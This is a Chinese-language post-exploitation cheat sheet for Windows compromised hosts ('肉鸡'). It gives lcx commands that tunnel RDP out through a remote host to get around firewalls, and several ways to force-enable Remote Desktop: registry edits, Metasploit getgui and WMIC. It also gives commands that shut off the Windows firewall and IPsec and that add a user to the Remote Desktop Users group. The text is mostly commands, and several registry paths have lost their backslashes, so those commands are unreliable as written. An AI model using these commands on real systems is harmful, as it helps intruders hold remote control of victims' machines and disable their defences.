lcx端口转发及远程终端问题

1、描述

2、lcx命令

3、本地转发

肉鸡（把自己的3389端口转给自己的3390端口）

lcx -tran 3390 127.0.0.1 3389

控制端连接

mstsc
连接目标ip:3390

4、远程转发

肉鸡主动向外连接，绕过防火墙

肉鸡（将自己的3389端口转给远程主机的8888端口）

lcx -slave 远程ip 8888 127.0.0.1 3389

lcx -listen 9999 8888

控制端

mstsc
远程ip:9999

二、远程终端问题集合

1、描述

远程终端的默认端口是3389，一般云服务器会开启，在较高的权限下可以使用注册表命令开启远程终端服务。

2、服务必须开启

必须确保远程终端的服务首先是开启的

#查询Remote Desktop Services服务
net start |find "Remote Desktop Services" 

#如果没有开启的话，手动开启
net start "Remote Desktop Services"

3、注册表开启远程终端

2008 2012 2016

echo DO ALL IN CMD! 
reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t
REG_DWORD /d 0 /f 
reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWds
dpwdTds	cp" /v PortNumber /t REG_DWORD /d 3389 /f 
reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f

4、msf开启

run getgui -e

5、一条命令开启

REG ADD "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

6、WMIC命令开启3389端口

**前提：**前提条件是确保“Windows Management Instrumentation(Winmgmt)”服务已正常启动。

**范围：**Win2k3/Win7/Win2k8/Win8.1/Win10/2012/2016(1：ON、0：OFF)

wmic RDTOGGLE WHERE ServerName=%COMPUTERNAME% call SetAllowTSConnections 1

7、各种关于远程终端的查询

查询是否开启远程终端（0为on 1为off）

REG query "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections

注册表查询远程终端开启的端口号

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp

#查看PortNumber字段
REG query "HKLMSYSTEMCurrentControlSetControlTerminal ServerWds
dpwdTds" /s
REG query "HKLMSYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP- Tcp" /v PortNumber 
set /a Port=0xd3d   (查询出来后转为整数结果为3389)

通过网络命令查询端口

tasklist /svc | findstr "TermService"    #查询服务进程号
netstat -ano | findstr "进程号"           #根据服务的进程号查询端口

8、关于防火墙导致的问题

#查询状态
netsh advfirewall show allprofile state    
#关闭防火墙
netsh advfirewall set allprofiles state off 
#关闭防火墙服务
net stop "Windows Firewall" 
#禁用防火墙
sc config sharedaccess start= disabled 
#关闭防火墙
net stop sharedaccess

6、关闭 ipsec

在关闭防火墙时，还是连接不上，可能是ipsec做了ip策略处理，导致连接失败可以使用命令

net stop "IPsec Policy Agent"

7、远程桌面连接错误（身份验证错误，函数不受支持）

可以使用相同版本的终端进行连接 或者使用 xfreerdp连接会自动加密

sudo apt install freerdp2-x11 
xfreerdp /f /u:administrator /p:123456 /v:192.168.0.118

8、加入远程桌面组

net localgroup "Remote Desktop Users" darkid /add

9、超出最大连接数

使用以下命令解决

mstsc /v:ip:3389 /console